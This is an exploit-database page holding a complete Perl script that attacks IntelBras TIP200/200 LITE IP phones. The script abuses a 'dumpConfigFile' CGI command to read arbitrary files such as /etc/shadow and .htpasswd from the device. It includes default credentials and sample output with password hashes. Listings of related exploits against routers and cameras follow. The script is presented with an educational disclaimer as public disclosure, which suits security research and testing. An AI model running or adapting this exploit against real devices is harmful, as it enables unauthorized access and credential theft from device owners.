Menu

Search for hundreds of thousands of exploits

"IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read"

Author

Exploit author

"Todor Donev"

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-09-02

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
#!/usr/bin/perl -w
#
#  IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#
#  Todor Donev 2019 (c) <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  [test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl 
#
#  # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#  # ========================================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # ========================================================================================================
#  # >  Authorization => Basic dXNlcjp1c2Vy
#  # >  User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Accept-Ranges => bytes
#  # <  Server => SIPPhone
#  # <  Content-Type => text/html;charset=UTF-8
#  # <  Expires => -1
#  # <  Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
#  # <  Client-Peer => 192.168.1.1
#  # <  Client-Response-Num => 1
#  # ========================================================================================================
#  root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
#  admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
#  guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
#
#  # ========================================================================================================
#  [test@localhost intelbras]$ 
# 
#  Simple Mode:
#  perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#"
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;

my $host = shift || '';
my $file = shift || '/etc/shadow';
my $user = shift || 'user';
my $pass = shift || 'user';

print "
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
# ========================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ /etc/shadow user user
# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);
my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " ");
$request->authorization_basic($user, $pass);
print "# ========================================================================================================\n";
my $response = $browser->request($request);
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
print "# ========================================================================================================\n";

if ($response->content =~ m/$file/g){

        my $content = $response->content;
        $content =~ s/$file//g;
        $content =~ s/^\n+//;
        print $content;
        print "\n# ========================================================================================================\n";
        exit;

} else {

        print "# Exploit failed or full path is wrong..\n";
        exit;
        
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
Release Date Title Type Platform Author
2020-02-24 "ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2020-02-24 "Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2020-02-24 "SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2020-02-24 "I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2020-02-24 "SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2020-02-19 "DBPower C300 HD Camera - Remote Configuration Disclosure" webapps hardware "Todor Donev"
2019-10-08 "Zabbix 4.4 - Authentication Bypass" webapps php "Todor Donev"
2019-09-23 "Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure" remote hardware "Todor Donev"
2019-09-09 "WordPress 5.2.3 - Cross-Site Host Modification" webapps php "Todor Donev"
2019-09-02 "IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read" remote hardware "Todor Donev"
2019-09-02 "Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection" remote hardware "Todor Donev"
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2018-07-11 "Awk to Perl 1.007-5 - Buffer Overflow (PoC)" local linux "Todor Donev"
2018-06-22 "Opencart < 3.0.2.0 - Denial of Service" dos php "Todor Donev"
2018-04-02 "Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change" webapps hardware "Todor Donev"
2018-03-30 "Tenda W316R Wireless Router 5.07.50 - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)" webapps asp "Todor Donev"
2018-03-30 "Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change" webapps asp "Todor Donev"
2018-03-28 "Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change" webapps hardware "Todor Donev"
2018-01-17 "D-Link DSL-2640R - DNS Change" webapps hardware "Todor Donev"
2017-06-18 "D-Link DSL-2640B ADSL Router - 'dnscfg' Remote DNS Change" webapps hardware "Todor Donev"
2017-06-17 "UTstarcom WA3002G4 - DNS Change" webapps hardware "Todor Donev"
2017-06-17 "Beetel BCM96338 Router - DNS Change" webapps hardware "Todor Donev"
2017-06-17 "D-Link DSL-2640U - DNS Change" webapps hardware "Todor Donev"
2017-06-16 "iBall Baton iB-WRA150N - DNS Change" webapps hardware "Todor Donev"
2017-01-22 "SunOS 5.11 ICMP - Denial of Service" dos unix "Todor Donev"
2017-01-19 "Pirelli DRG A115 v3 ADSL Router - DNS Change" webapps hardware "Todor Donev"
2017-01-19 "Tenda ADSL2/2+ Modem D820R - DNS Change" webapps hardware "Todor Donev"
2017-01-16 "Pirelli DRG A115 ADSL Router - DNS Change" webapps hardware "Todor Donev" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected